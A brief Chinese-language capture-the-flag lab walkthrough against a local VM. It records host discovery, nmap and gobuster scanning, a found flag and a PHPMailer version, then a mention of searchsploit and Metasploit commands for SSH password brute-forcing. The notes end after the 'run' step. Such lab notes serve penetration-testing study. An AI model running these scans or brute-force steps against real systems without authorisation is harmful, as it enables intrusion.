- 信息搜集
netdiscover 192.168.136.0/24
192.168.136.144
端口扫描:nmap -sS -sV -A -p 1-62235 192.168.136.144
22/80/111/41755
目录扫描:
gobuster dir -u http://192.168.136.144/ -w /usr/share/dirbuster/wordlists/directory-list-1.0.txt
http://192.168.136.144/vendor/PATH
/var/www/html/vendor/
flag1{a2c1f66d2b8051bd3a5874b5b6e43e21}
phpmailer版本
- 漏洞利用
2.1在kali上利用searchsploit 上的phpmailer进行利用
对22端口利用msf进行ssh爆破
msfconsole
search ssh
use 52
set user_file /usr/share/metasploit-framework/data/wordlists/common_roots.txt
set rhost 192.168.136.144
run